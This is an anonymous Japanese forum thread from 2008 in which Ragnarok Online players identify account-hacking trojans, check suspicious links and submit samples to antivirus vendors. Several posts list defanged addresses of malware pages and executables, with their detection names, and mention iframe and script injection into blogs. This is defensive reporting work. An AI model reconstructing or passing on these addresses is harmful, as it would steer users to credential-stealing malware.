ROではハックがあること、危険なアドレスの可能性もあることを付記して
mixiに通報してしまえば良いんじゃないだろうか?
あとは、その書き込み相手は、アクセス禁止設定する(詳細はmixiにあるのでそちら参照願います)

58 名前:55:08/03/21 12:04 ID:NL0iOyoW0
素人でどうこうできるものではなさそうですね・・・
大人しく>>57さんのアドバイスどおりにしたいと思います。ありがとうございました。

59 名前:(○口○*)さん:08/03/21 12:20 ID:ls33Z00D0
ついでに、そのアドレスをここに(アドレスのピリオドを■に置き換えて)投稿して欲しい。
誤クリックしそうなら、やめといてもいいけど。

60 名前:55:08/03/21 14:11 ID:NL0iOyoW0
>>59さん
はい・・・

http://ly■qhboy■com/ragnarokonline/VID-da-g-dt-w-r-12-vg-130x100-vt-flash/mms22687ba■wmv■zip

でした。

61 名前:(○口○*)さん:08/03/21 14:53 ID:ls33Z00D0
>>60
thx

カスペさんすりぬけてるので、検体提出行ってきます。

mms22687ba.wmv.zip :
HIDDENEXT/Worm.Gen(AntiVir)
Trojan.Inject.796(DrWeb)
Suspicious File(eSafe)
PWS:Win32/Magania.gen(Microsoft)
Virus.HIDDENEXT/Worm.Gen(Webwasher-Gateway)

mms22687ba.wmv.exe :
Trojan.Inject.796(DrWeb)
Suspicious File(eSafe)
PWS:Win32/Magania.gen(Microsoft)

62 名前:(○口○*)さん:08/03/21 15:30 ID:XSsjgazG0
43,008バイトでDr.WEBとMicrosoftが捕獲というと
ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/528
ttp://www.virustotal.com/analisis/ac9b75b1bfca82b29a5801da2ff0aa36
と同じ系統だね。

63 名前:(○口○*)さん:08/03/21 16:59 ID:ls33Z00D0
検出名称同じだしね。

カスペ:次の更新で対応
mms22687ba.wmv.exe_ - Trojan.Win32.Inject.aix

64 名前:(○口○*)さん:08/03/22 00:52 ID:e8pF72D10
明日警察行くことになったらから帰ってきたらレポしますね(´;ω;`)

65 名前:(○口○*)さん:08/03/22 02:13 ID:2MZCYhKy0
あのー・・・happy.nuってドメインって危険なんですかね?
貧スレの下のほうにあるリンクに接続したら真っ白なままなんですが

なんかやばいサイトにぶち当たったかな?
一応カスペ先生でPCチェックしても今のところは異常ないんだが。

http://ragwalk■happy■nu/blog/

66 名前:(○口○*)さん:08/03/22 02:29 ID:UmL3MAwQ0
>>65
※※※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ※※※

そこは、Wiki管理人さんのとこですよ。

iframe飛ばしも、変なスクリプトもないですし。真っ白なのは他に原因があるんじゃないですかね。
DNS参照してIPに変換して、whoisで調べ、某国でないことも書いとくと安心かな?

「ragwalk.happy.nu」のIPアドレスへの変換結果→「221.186.251.72」
「221.186.251.72」のドメイン名への変換結果→「s67.xrea.com」
−−−−−
アクセサリからコマンドプロンプト開いて、nslookup ragwalk.happy.nu と入力するとIP出てきますから、試してみてね。

67 名前:(○口○*)さん:08/03/22 02:33 ID:UmL3MAwQ0
リネージュ資料室の更新情報から拾ったもの。

ttp://www■dyparagon■co■kr/gon/gmsex■exe
ttp://www■symphones■com/wikipedia/
ttp://www■symphones■com/wikipedia/index1■htm
ttp://www■symphones■com/wikipedia/rmtjp■exe
ttp://www■qsuj■com/win■exe

gmsex.exe : Backdoor.Win32.Delf.hds(Kaspersky)
index.htm : HTML/IFrame(Authentium/F-Prot/F-Secure),HTML.Iframe-12(ClamAV)
index1.htm : Trojan-Downloader.VBS.Agent.kv(Kaspersky),JS/Dldr.Noopt.1969(AntiVir)
rmtjp.exe : Trojan.Win32.Inject.agj(Kaspersky),Trojan.Inject.796(DrWeb)
win.exe : TR/PSW.Stealer.73728.2(AntiVir),Suspicious:W32/Malware!Gemini(F-Secure)

win.exe は、カスペすりぬけ。「Trojan-Spy.Win32.Agent.but」として、次回更新で対応。

68 名前:(○口○*)さん:08/03/22 02:47 ID:2MZCYhKy0
>>66
すばやい返事ありがとうございます

管理人さんところでしたか

66の記事を見た後接続したら、かなり表示が遅かったですが
中身見れました。

どうもお騒がせ致しました

69 名前:(○口○*)さん:08/03/22 02:55 ID:UmL3MAwQ0
トレンドマイクロのWeb改竄、ウイルス感染の恐れは6ページのみ
http://internet.watch.impress.co.jp/cda/news/2008/03/21/18898.html

70 名前:(○口○*)さん:08/03/22 04:49 ID:IFhPZTqz0
668 名前:どう見ても餃子です[] 投稿日:2008/03/21(金) 22:36:03 HOST:hades.sense.jp
関係ないけど、垢ハックされたくなかったら
ギルドを転々としてるやつが居るギルドには入んないほうが良いよ。

同じギルドだとアトラクションIDがバレバレになってるから注意。
出入りの激しいギルドに居る場合はパスワードはこまめに変えたほうがいい



こんな書き込みあったんだけどアトラクションIDってゲーム内でばれるものなんでしょうか???

71 名前:(○口○*)さん:08/03/22 05:47 ID:3nzrbRyw0
知られてないが、ある条件を満たすとゲーム内でアトラクションIDが漏れることがある。
条件の1つが同一ギルドであること。

当然、本人がばらすとかそういうのではない。

72 名前:(○口○*)さん:08/03/22 08:06 ID:UmL3MAwQ0
>>70
>こんな書き込みあったんだけどアトラクションIDってゲーム内でばれるものなんでしょうか???

ばれません。

アトラクションIDと1:1対応している(キャラ作成時に自動で割り振られる)アカウントIDならゲーム内で流れており
きゃらくえなどの情報収集をしているツールで抜き取ることができるが、その数字とアトラクションIDを結びつけるためには
ログインサーバーのDBをクラッキングして盗み出さなければならない。

パスワードに関連する情報はゲーム内では一切流れていないため盗み出すことができません。

他にも、アカハック品を並べている露店や、BOTの露店を見るだけで情報が盗み出されるというでまかせを
ゲーム内で言っている人がいますが、あれも嘘っぱちです。盗むことのできる情報は流れてきません。

ゲーム内でIDとパスを盗み出すことができるのであれば、アカハックトロイなんか必要としないんですよ。

>>71
嘘情報を流すのは感心しないな。このスレでは、事実無根の情報は排除すべきものです。

73 名前:(○口○*)さん:08/03/22 09:19 ID:3nzrbRyw0
>>72
嘘を言ってるのはお前だ。

74 名前:(○口○*)さん:08/03/22 09:26 ID:YrdFiajn0
「ある条件」とか春っぽいこと言ってないで詳しく書いたら?

公になれば対策に動いてくれるだろうし
思わせぶりに一部だけが知ってるような書かれ方の方がよっぽど不安や危険があるんじゃない?

75 名前:(○口○*)さん:08/03/22 12:52 ID:KKCxjTmg0
今現在罠が撤去されていない&晒しになるので具体的なURIは避けるが
ブログをハックしてのiframeタグ注入、scriptタグも併用している模様。
注意されたし。

76 名前:(○口○*)さん:08/03/22 16:02 ID:IFhPZTqz0
>>72 ありがとう キャラIDならともかくアトラクションIDとかってゲーム内関係ないよなって
思ったんだが自分知識がなくてちょっと困ってた

>>75 そのブログ運営に通報して 「ハッキングされたかもしれない」といっておけば
一次ブログ凍結、調査本人確認で対処してくれると思う
運営によっては放置なところも多いけどそのまま放置しておくよりは全然いい

ハッキングさたのを装って 他のブログからいろいろ丸パクで偽罠ブログ作るやつもいるからな
ソレは本当にハッキングされたブログなのか?
アドレス出さないんじゃ注意しようもないと思うんだけど
ハッキングされたんだとしたらそのブログの通常読者は普通に訪問しちゃうわけだろ?
せめてiframeの飛ばし先でも晒して検体に出てるものかどうかデモチェックしてみたらどうだ?

77 名前:(○口○*)さん:08/03/22 16:24 ID:KKCxjTmg0
業者ブログではない。
先方へのコメントは既にしたし、今見たらパスワード認証になっている。
一時的に閉鎖してチェックしているのか恒久的な閉鎖なのかは知らん。
飛ばし先は既出のhellh■net、スクリプト解読してVTに投げ検体も各社に提出済み。
iframeだけじゃなくてscriptも使われている、というブログ管理者への注意喚起。
他のコミュニティにも注意喚起してある。これでご満足いただけましたかね?

78 名前:(○口○*)さん:08/03/22 17:04 ID:TmdSs/By0
最初から検体提出済みのものが仕込まれた一般ブログがあるって書けばいいのに

79 名前:(○口○*)さん:08/03/22 19:44 ID:kzb1gLs00
>>73
>>71のような書き方をすれば妄想乙で済まされるのが人の世の常なのでkwsk

80 名前:(○口○*)さん:08/03/22 19:49 ID:IFhPZTqz0
>>77 詳細ありがとう
最初からそうかいてくれたら突っ込みレスしないでいいのにw

>>73 できればkwskだけど
公開しなくてもいいから公式に通報よろw

81 名前:(○口○*)さん:08/03/22 20:31 ID:3nzrbRyw0
詳しく書いたらリアルBAN、癌に通報すればROでBANされそうだからな。
だからβ2のギルド実装時からずっと放置されてるんだろう。

IPAの脆弱性通報フォームとかに報告したら国が動いてくれるんかな?

82 名前:(○口○*)さん:08/03/22 20:53 ID:TmdSs/By0
知ってて黙ったまま被害が増えるのも消極的幇助だと思うけどね
前にPTくずすやつもRO内で広まってから対策されたんだし、
IDだけバレてもパスがわからなきゃハックはできないんだし、
パスごと抜けるんなら尚の事、ステアドからでもいいからガンホーに送りつけて欲しい

83 名前:(○口○*)さん:08/03/22 20:58 ID:8A3jFT2l0
>>81
そういうことは普通にガンホーに通報すべき。〜BANとか禿げしく考え過ぎ。
それでROをBANされたらある意味いいネタだし、止めるいい機会だとも思える。
リアルBANがどういう意味で使っているか知らないけど、法律や判例くらいは目を
通してみるといいかもね、気になるなら。
ま、通報してガンホーが動くかは別問題だが(現実にそういう問題が有ったとして、
開発はあの技術力の重力だからねぇ…)。

そしてこの程度じゃIPAは動かないし、脆弱性があったとしてもIPAは何もしてくれない。
あそこは起こっている事象を観察している所だから。アラート位は出してくれるが。

世の中には表と裏はあるけど、妄想に浸るほどの深い裏はないもんだよ。

84 名前:(○口○*)さん:08/03/22 22:03 ID:IFhPZTqz0
もしかしてキャラIDとアトラクションIDとガンホーIDとかの区別ついてないひとだったり

85 名前:(○口○*)さん:08/03/22 23:01 ID:UmL3MAwQ0
>>84
その可能性が高いけれど、ゲーム内で扱われているアカウントIDの話とも食い違う辺りが不思議。
ID:3nzrbRyw0 さんの発言内容は、既知のパケット内容と矛盾している。

ガンホーID:アトラクションセンターへの接続などに利用。このID配下に各種アトラクションIDが関連付けられる。
        ゲーム内では一切流れない。
アトラクションID:なんたらROという、ログインで入力するためのID。ゲーム内では一切流れない。

アカウントID:キャラクター作成時期に従って連番で割り振られる。若い方の数字はMOBやホム、NPCのIDで利用される。
         ゲーム内で流れているものは基本的にこのID。きゃらくえなどで表示(ゲーム内で抜かれる)のはこのID。
         アトラクションIDと1:1対応するが、逆引きができないので、このIDからアトラクションIDを知ることは不可能。
キャラクターID:キャラクター固有のID。カートの管理とか、銘入り武器POTなどの名前参照に利用されている。
          このIDで処理すればいいのに、何故かゲーム内で普通に流れるのはアカウントID。
          このIDは取り引き要請の際に届く。露店や所持品で銘入りのものを見た時にも、該当銘のIDが流れてくる。
          このIDはどのアカウントIDの何スロット目に何回目に作成したキャラであるという情報まで含んでいると
          聞いている。変換式も前に聞いたが忘れた。某価格調査サイトで銘検索が可能なのは、露店で銘入り武器を
          見た時に届くこのIDからアカウントIDを逆引きし、DBから拾っている為。(そのためゲーム内では名無しなのに
          某価格調査サイトで、消えている筈のキャラの銘が表示されたりするのはそのせい)

もしかして、ID:3nzrbRyw0 さんは、ギルド情報のメンバー一覧を表示させたときに届くキャラクターIDのことを
アトラクションIDと誤認してるだけなんじゃないだろうか。ログインに必要な情報とは結びつきませんよ。

86 名前:(○口○*)さん:08/03/23 00:23 ID:bSmpyOjV0
不正対策が更新とか表示してクライアント落ちたのはいいけど
パス無しでログインできるようになって・・・なんかヤバくね

87 名前:(○口○*)さん:08/03/23 00:25 ID:3L+x1vvV0
>>86
仕様です。問題ありません。

あと、あの不正対策というのは、思いっきり嘘メッセージなので(ry

88 名前:(○口○*)さん:08/03/23 00:37 ID:bSmpyOjV0
だ、だまされたぜ
さんくす

89 名前:(○口○*)さん:08/03/23 02:37 ID:6Eolj0xs0
>>85
思いっきり間違ってる場所ばっかなんでつっこませてもらう。

> ゲーム内では一切流れない。

これが違うってのがそもそもの話。

> キャラクター作成時期に従って連番で割り振られる

キャラとは一切関係ない。
アカウント作成順に連番が割り振られる。

> このIDはどのアカウントIDの何スロット目に何回目に作成したキャラであるという情報まで含んでいる

こちらはキャラクター作成順に連番。

> 某価格調査サイト

上の前提が間違ってるから当然これも間違い。

90 名前:(○口○*)さん:08/03/23 03:43 ID:yk76YM7m0
>>89
揚足取りの所悪いんだが、別に>>85の言ってる事の大筋は間違ってないぞ
あと、間違いっていうなら正しい解答も載せないと煽りにしかならないとおもうぜ

> ゲーム内では一切流れない。
これが違うってのがそもそもの話。

こういう部分、どう違うのかkwsk

91 名前:(○口○*)さん:08/03/23 03:49 ID:6Eolj0xs0
正しい答え書いてあるだろ?

92 名前:(○口○*)さん:08/03/23 04:17 ID:wY6x4vAg0
答えを知ってるんだったら>>83が言ってる通り
ガンホーに通報するべき
過去に悪用したことがないのなら、堂々と修正を迫るべきだ
それが出来ずにここで件の事象を知らない我々を煙に巻いても何にもならないぞ

93 名前:(○口○*)さん:08/03/23 04:32 ID:tlsLS2Os0
実害が出るとしても言うべき
過去の例からも広まって実害が出ないと癌は対応しない
それでも言わず通報せずってんなら釣り

94 名前:(○口○*)さん:08/03/23 06:44 ID:3L+x1vvV0
>>89
>> キャラクター作成時期に従って連番で割り振られる
>アカウント作成順に連番が割り振られる。

あ、ごめん。そこんとこだけ誤記入。アカウント作成時期が正しい。

だが、趣旨は「アトラクションIDはゲーム内では一切流れない」。既知のID類も>>71の主張とは異なる。ということ

95 名前:(○口○*)さん:08/03/23 08:21 ID:qaXj137C0
>>75-77
それFF11のブログじゃね?
アクセス1000以上/dayの大手ブログばかり狙われてるから
あっちじゃそれなりに騒ぎになっているようだね。

96 名前:(○口○*)さん:08/03/23 10:21 ID:qdEGfoPr0
1日だけのネタ逃げ書き込みと思ったら今日もいるのか、春休みで暇なんですかね?

97 名前:(○口○*)さん:08/03/23 11:43 ID:xBwZirke0
>>95
リネ2のパス抜きが入っていたりする

98 名前:(○口○*)さん:08/03/23 13:11 ID:uB98t7uQ0
スレぶった切りだが、日記で貧スレWikiの人かなりイラついてた。
まぁ有料契約をしてるサーバーが不安定状態の上自分が管理し
てる場所を危険アドレス?とか言われたらな。気持ちはわからなくはない

実はWikiが多く設置されているXREAは最近不安定なこと多い
ここで話題にならなかったのはWikiが設置されているサーバーの鯖が
表立って問題がおきてなかったことが大きいと思う
まぁ、雷鳥Wikiの500サーバーエラーも関係してる可能性はある
ただ同じサーバーのROデータテンプレは正常稼動していたから
如何なのかは言いづらいが、XREAからの公式発表が無いからなぁ

>>65のアドが真っ白なのは確実に
s67サーバーが現在進行形で挙動おかしいからと思われる。
俺も実際日記読んでると白紙ページに当たるよ

99 名前:(○口○*)さん:08/03/23 15:18 ID:bAjvYCCS0
なんかどっかで見た気もするが、どうやっても検索できないので質問。

カスペ7(6もだった気がする)使ってると毎日0時に一瞬重くなって、RO窓も
フリーズしたみたいになる。
でも1日1回時間指定ならまだ予測できるしいいやと思っていたんだけど、
MP1からはこの現象が0時じゃなくて不定期に起こるように変わったみたい。
(それこそ場合によっては1時間に1回以上とか)
ゲーム中に不意にフリーズもどきになるのがかなり悩ましいんだけど、
これってセルフディフェンス関連だっけ?

とりあえず2PCで両方とも起こるから俺だけじゃないとは思うんだけど、
原因でも軽減策でも何でもいいので、何か知っている人いない?

100 名前:(○口○*)さん:08/03/23 15:52 ID:4P3UfO9w0
Updateが無いかどうか0時に確認しに行くだけ。
あれ、非常に鬱陶しいな。

101 名前:(○口○*)さん:08/03/23 16:22 ID:gNr0BMcR0
しかも、更新を手動にしててもなるし…

102 名前:(○口○*)さん:08/03/23 16:51 ID:bAjvYCCS0
ありがとう。言われてみればUpdateだった気がする。すっきりした。

毎日0時は仕方がないとしても、日中に起こるのはもしかしたら手動にすれば
軽減されるかもしれないので、試してみるよ。サンクス。

103 名前:(○口○*)さん:08/03/24 02:29 ID:Y9Es2Z/E0
リネージュ資料室の更新情報より。全て各社に検体提出済。

ttp://www■caremoon■net/wiki/main■htm
ttp://www■panslog■net/wiki/index1■htm
ttp://www■ragnwiki■com/read/index1■htm
ttp://www■ragnwiki■com/read/server■exe
ttp://www■shagigi■net/navi/index1■htm
ttp://www■shagigi■net/navi/admin■exe
ttp://www■soracger■com/wiki/admin■exe
ttp://www■teamerblog■com/wiki/cer■exe
ttp://www■wacacop■net/wiki/index1■htm
ttp://www■wacacop■net/wiki/sever■exe
ttp://www■xinluoqu■com/ied/index1■htm
ttp://www■xinluoqu■com/ied/ser■exe

*** Kaspersky ***
admin(1).exe : Trojan.Win32.Inject.ajz
admin.exe : Trojan.Win32.Inject.ajw
cer.exe : Trojan-PSW.Win32.OnLineGames.vxq,Trojan.Win32.Inject.aka
cer\f1.exe : Trojan-PSW.Win32.OnLineGames.vxq
cer\seakinfo.exe : Trojan.Win32.Inject.aka
index1(1).htm : Trojan-Downloader.VBS.Psyme.nm
index1(3).htm : Trojan-Downloader.VBS.Psyme.nm
index1(4).htm : Trojan-Downloader.VBS.Psyme.nm
index1(5).htm : Trojan-Downloader.JS.Agent.bnd
index1.htm : Trojan-Downloader.VBS.Psyme.nm
main.htm : Trojan-Downloader.VBS.Psyme.nm
ser.exe : Trojan.Win32.Inject.aja
sever.exe : Trojan.Win32.Inject.ajy

*** Kasperskyすりぬけ ***
server.exe : Trojan.Inject.796(Dr.Web),Suspicious File(eSafe),PWS:Win32/Magania.gen(Microsoft)

104 名前:(○口○*)さん:08/03/24 02:35 ID:Y9Es2Z/E0
提出作業してる間に、カスペのパターンが更新されてたようだ。今、再スキャンしたら検知した。
という訳でカスペは全部撃墜になりましたと。

server.exe : Trojan.Win32.Inject.akm

105 名前:(○口○*)さん:08/03/24 07:24 ID:/HyacwI80
昨日製造
world0fwarcraft■net/lese.exe
766598■com/lese.exe (上と同じ)
www■qsuj■com/win.exe

今日製造
www■infosueek■com/xin/ff11.exe
www■play0nlink■com/ma/ff11.exe
www■jbbslivedoor■com/ff11.exe

というかこの手のはあっちでもいいんじゃないか?

106 名前:(○口○*)さん:08/03/24 11:36 ID:Y9Es2Z/E0
>>105
んー、具体的事例というには弱いかなと。ROのアカハック用じゃない場合もあっちでいいのかは疑問だし。
でも、情報集積(呼び出し手順だの)には必要な情報だから、総合スレでもいいという気持ちもある。

RO板で削除依頼の出ていた投稿について、総合スレに転記しといた(削除依頼スレにもその旨投稿)ものが
運営側でセキュスレに書かれたこともあるので、こっちの方がいいのかなとか。

RO内でアカハックに遭ったとか、RO用BBSに貼られてたものとかは、総合スレに書こうと思ってるけど
ぶっちゃけ、使い分けについて、もうちょっと話し合った方がいいんじゃないかと思う。

107 名前:(○口○*)さん:08/03/24 11:42 ID:Y9Es2Z/E0
>>105
カスペは全機撃墜

Trojan-PSW.Win32.OnLineGames.fcj : ff11(1).exe//PE_Patch//UPack
Trojan-PSW.Win32.OnLineGames.fcj : ff11(2).exe//PE_Patch//UPack
Trojan-PSW.Win32.OnLineGames.fcj : ff11.exe//PE_Patch//UPack
Trojan-PSW.Win32.OnLineGames.wcw : lese(1).exe//UPX
Trojan-PSW.Win32.OnLineGames.wcw : lese.exe//UPX
Trojan-Spy.Win32.Agent.bvd : win.exe

108 名前:(○口○*)さん:08/03/24 12:58 ID:vvxmB4Mz0
ROを起動したら「HPlzm12」というルートプロセス(うろ覚え)を発見したとかでカスペが叫んだ
操作を終了させたらROも終了した

このプロセス名は過去何度かタスクマネージャで見た覚えがあるが、
HPのプリンタ使ってるからその関係だと思ってた
もしかしてnProと関係ある?
それとも垢ハックウィルス…?
誤検出ならいいんだが…

109 名前:(○口○*)さん:08/03/24 15:09 ID:Y9Es2Z/E0
nProとは関係ないな。カスペのログから検出銘を確認してぐぐれ。

110 名前:(○口○*)さん:08/03/24 15:25 ID:vvxmB4Mz0
なるほど
ログを見るって手があったか

2008/03/24 12:50:31 プロセスを実行します C:\WINDOWS\system32\HPZipm12.exe: リスクウェア 「Hidden object」。の亜種として検知しました!

ググってみたらやっぱりHPのプリンタに関係あるっつーことが判明した
ROが終了したのは謎だが脅威はなさそうだ
お騒がせしました

111 名前:(○口○*)さん:08/03/24 17:39 ID:kuFhp1KL0
>106
危険アドレス関係は全部向こうでいいと思うけど。

そもそもスレ住人では出来る範囲ってのは、次のどれか

A)ソースチェッカー等で白・黒・グレーの判断
 A-1)既知の罠アドレスかどうかの判断
 A-2)ソースをチェックして怪しい部分が無いかの判断
B)検体が拾えた場合(この時点でほぼ黒だが)
 B-1)VirusTotal等に掛けて結果で判断
 B-2)検体をメーカーに提出して、結果で判断

そしてBの段階まで進んで何かのトロイだと判明したとしても、それがRO関係かどうかは
アンチウィルスメーカーじゃないと判断つかない。

となると、ROに関係しそう・関係なさそうだから、という判断で区切るよりは、危険アドレスは
全部向こうに張った方が楽だと思う。

個人的には、向こうは危険アドレス収集(とチェック結果)スレ、こっちは今まで通りの
セキュリティ全般という形がいいんじゃないかと思ってる。

112 名前:(○口○*)さん:08/03/24 18:11 ID:/HyacwI80
同意。
黒なURIはあっちでいいんじゃないかと。
仮にスキャンしてWoW用とかLineage用とかGamania用とか出ても
複数のパス抜きを併用するのがいくらでもある現状では振り分けていられない。

113 名前:(○口○*)さん:08/03/24 23:31 ID:Y9Es2Z/E0
「Kaspersky Internet Security 7.0」を無料で最大90日間体験できる
「Kaspe de ROULETTE(カスペ で ルーレット)」キャンペーンを本日より開始
〜サイト上のルーレットで30日+αの試用版をもれなく提供〜
http://www.justsystems.com/jp/news/2008f/news/j03241.html

114 名前:(○口○*)さん:08/03/25 06:55 ID:cw7cbgmc0
ttp://shadow-city■blogzine.jp/net/2008/03/post_4a04■html
ニュースサイトに貼られていたリンクですが、異常に重い真っ白な画面が出てくるだけでした。
まさかとは思いますが、危険性のあるサイトでしょうか?

115 名前:(○口○*)さん:08/03/25 07:40 ID:JR+J3jJW0
>>114
※※※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ※※※

真っ白だったというだけで持ち込むのはやめれ

116 名前:(○口○*)さん:08/03/25 10:09 ID:kGEbjaPP0
さて今日はゲーム鯖の接続カット予定日だが、アカハック防止効果が出てくれるといいが…

117 名前:(○口○*)さん:08/03/25 10:14 ID:JR+J3jJW0
BOTの「直接」接続がブロックされるだけで、中継サーバー経由の場合は防止されないし、アカハック防止はないと思うぞ。
BOTの直接稼働ができなくなる分、中継サーバー経由や、アカハックに力を入れてくる可能性はあるけど。

118 名前:(○口○*)さん:08/03/25 11:24 ID:kGEbjaPP0
国内に中継鯖建てたら建てた奴がかなりリスク無い?

119 名前:(○口○*)さん:08/03/25 12:23 ID:n3S5/B8a0
奴らにとって収入>リスクだからな、結構留学生が捕まってるだろ

120 名前:(○口○*)さん:08/03/25 13:03 ID:0+b7G0a50
その場合でも、癌が警察に被害届けを出すかどうか、が焦点になるわけで。

121 名前:(○口○*)さん:08/03/25 14:42 ID:gUTI9l8w0
話題ぶった切りごめんなさい。
http://www■exbloog■com/7112888/
上記のURLを踏んでしまいました。
垢ハックに対する知識が少ない為、判断しがたいのですが、垢ハックURLでしょうか;;

122 名前:(○口○*)さん:08/03/25 14:44 ID:JR+J3jJW0
>>121
まずはソースチェッカーで確認するんだ

123 名前:(○口○*)さん:08/03/25 14:45 ID:JR+J3jJW0
あ、ちなみに、それアカハックな

124 名前:(○口○*)さん:08/03/25 15:03 ID:JR+J3jJW0
>>121
アカハックのアドレスだったので、総合スレにコメントしときました。(^^)ノシ

アカウントハック総合対策スレ9
ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/537

125 名前:(○口○*)さん:08/03/25 15:52 ID:gUTI9l8w0
ぎゃー、垢ハックでしたかorz

>>122-123>>124
ありがとうございます。お手数おかけしました;;

PCの初歩的な質問になってしまうのですが、スレ内で「PCリカバリ」などを
見かけるのですが、PCを初期化させるって事でいいんでしょうか?

126 名前:(○口○*)さん:08/03/25 17:43 ID:QUeDnFP60
>>125
YES

メーカー製PCだと「リカバリCD」とかいう感じの、これで再インストールしたら
出荷時の状態に初期化できますよというのがついてることが多い

127 名前:(○口○*)さん:08/03/25 19:07 ID:Aq92ZzvG0
FFが派手にやられてるようだね。
人気ブログそのものを改竄してiframe埋め込む手法で。

128 名前:(○口○*)さん:08/03/25 19:42 ID:Vdcuyq8A0
最近はscript使ってるっぽい。
これだとほとんどのブログで使える。

129 名前:(○口○*)さん:08/03/25 20:01 ID:gUTI9l8w0
>>126
返答ありがとうございました。

当方少し前にPCを修理に出し初期化したばかりで、特に大切なデータも
なかったので、バックアップは取らずに初期化しました。
>>6の手順を見ると、1−4の行程をすっ飛ばした形で、ROに接続できる状態に
なったと判断して大丈夫でしょうか?

130 名前:(○口○*)さん:08/03/26 05:28 ID:DGUvGzad0
>>129
乙。
今後重要なのは、1-3関連。要は再発防止策になるな。
今のうちに手間を掛けておくことで、以後再インストールが必要になったりする手間を減らせる可能性が出てくるのだから。

131 名前:(○口○*)さん:08/03/26 09:25 ID:Wgd+zMzM0
皆様乙であります。>>43,44です。
昨日、相方の住所等個人情報と、相方側の相談署と担当者さんの名前を
私の担当者に連絡入れました。
ほぼ調書は出来ているそうで、目を通してサインしてもらう必要があるので
また後日連絡しますとのことでした。
調書にサインなんてあるんですねぇ。はじめて拝見するので、少し楽しみです。

132 名前:(○口○*)さん:08/03/26 12:14 ID:c1/5kyG10
すいません、相談があります
青箱46個目スレで 884番目のレスに反応して踏んでしまいました(?) 
その後915番目のレスにて アカハックサイトと書かれて居るのを見ました。
このサイトは本当にアカハックサイトなのでしょうか?

【      気付いた日時          】 08/03/26 10:42
【不審なアドレスのクリックの有無 】 クリックしました
【  アドレス   】kkuro■exblog■jp
【     OS    】WindowsXP Home SP2
【使用ブラウザ 】IE6.0 sp2
【WindowsUpdateの有無】 3月13日 自動更新
【 アンチウイルスソフト 】 VB2008 アップデート最新
【その他のSecurty対策 】無
【 ウイルススキャン結果】 VB2008で検索→何も無し
             カスペオンライン→ウイルスは何も検出されませんでしたが
             結構な数のファイルが 使用中でロックされています とでます
【テンプレの参考サイトを読んだか】 (Yes)
【hosts変更】無
【PeerGuardian2導入】無
【説明】
1・同スレのレスにて アカハックサイトとの事
2・ソースチェッカーにて インラインフレーム1 隠しスクリプト10
  安全度が48%だったので 怪しいと思いました

カスペでの検索結果の ロックされているのは無視でも大丈夫ですか?

133 名前:(○口○*)さん:08/03/26 12:41 ID:9EOI6ixV0
>>132
0サイズのインラインフレームタグはあるけど

<iframe name="cmtviewfrm" id="cmtviewfrm" src="" width="0" height="0" border="0" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" style="display:block"></iframe>

具体的な飛ばし先はないっていうかこれCM表示かなんかの枠かね?
表示されないようになってるけど
exblogはiframe使えないと思ってたけどCSSのほうになら使えるのかな?

使用中でロックというのはウィルスをロックではなくて
起動していて干渉できなかったということなんじゃないかと
色々終了させて再度かけてみたら?

134 名前:(○口○*)さん:08/03/26 13:26 ID:OHIAVHbi0
iframeのsrcが無いので仕掛けるの失敗したとか駆除したとか?

Firefox2.0.0.13リリース

135 名前:(○口○*)さん:08/03/26 13:37 ID:90OFAAH00
exciteが勝手に埋め込むもの
用途はいまいち不明だけどCoMmenTVIEWFoRMじゃないかね

136 名前:132です:08/03/26 19:03 ID:c1/5kyG10
他のExciteブログのHPをチェッカーで調べたところ
>>133 が書いているタグ(?)と同じ物が書いてありました
>>135 が言っているようにExciteが勝手に埋め込んでる物みたいです

後、ロック〜〜もソフトとかを終了させて検索したら 数が減りました
VB2008とカスペオンライン の検索結果も 感染無しでした

これは、安全だと思っても大丈夫ですか?

137 名前:(○口○*)さん:08/03/26 19:26 ID:9s8it81m0
>136
安全・大丈夫と思うのは自由。
本当に安全かどうか・大丈夫かどうかは誰も保障できない。

今回のケースだと、状況から見る限り「多分」平気と「俺」は考える。
でも本当に安全かどうかは何とも言えない。

何故かというと、

A)青箱スレに書かれた時点で罠があり、>132がそれを踏んだ
B)その後、ハク犯が罠の記述を消した
C)>133が見た時点では罠の痕跡が無かった
D)踏んだ罠が新種でカスペでも検出出来ない代物だった

可能性だけでいうならこういう事も有り得る。

この場合「多分平気」と誰かが言ったとしても、実は平気ではなかった、という事になる。

周りは助言は出来ても最終の判断は下せない。
厳しいようだけど、安全かどうか・大丈夫かどうか、の判断を下せるのは当人だけ。

138 名前:(○口○*)さん:08/03/26 21:18 ID:RXEAPV+Y0
検体提出先修正。セキュWikiの検体提出先は修正済

Quick Heal
<support@quickheal.com> → <viruslab@quickheal.com>

139 名前:(○口○*)さん:08/03/26 21:55 ID:OHIAVHbi0
あれ、アドレス変わった?
今朝supportに送っちゃった。

140 名前:(○口○*)さん:08/03/26 22:09 ID:wAhgc5zB0
メールがエラーで戻ってきていないなら、恐らく自動的に転送されている

141 名前:(○口○*)さん:08/03/26 22:28 ID:RXEAPV+Y0
>>139
問題ないよ。そっちでも受け付けてる。但し、viruslubの方がbetterだって返答も来てる筈だ。

142 名前:(○口○*)さん:08/03/26 22:36 ID:RXEAPV+Y0
ちょっと気になったので、過去のメール履歴見てみた。
(気付いたのは今日なんだ…いつも読まずに読了にしてた)

QuickHeal担当者さんごめんなさい。ずいぶん前から宛先変えてくれって言ってたんだね。
表現が替わってるところを見ると、テンプレじゃなく書いてくれてたみたい。正直すまんかった。

2007/12/28
We request you to send further virus samples at viruslab@quickheal.com.

2007/12/31
Well, we request you to send the further samples at viruslab@quickheal.com

2008/01/04
Well, we request you to modify your e-mail address list and add viruslab@quickheal.com
ID in place of support@quickheal.com

2008/02/04
We request you to forward these samples directly to viruslab@quickheal.com

2008/03/11
We will be highly obliged if you will keep forwarding such samples to viruslab@quickheal.com

2008/03/21
We request you to send all such samples directly at viruslab@quickheal.com ID.

2008/03/24
We will be highly obliged, if you will start forwarding such mails to viruslab@quickheal.com
This Id is dedicated for receiving samples of malwares. For better assistance,
I request you to forward such samples ONLY to viruslab@quickheal.com.

2008/03/25,26
You are requested to forward the samples at viruslab@quickheal.com for better assistance.

143 名前:(○口○*)さん:08/03/27 06:54 ID:IkGkCxxT0
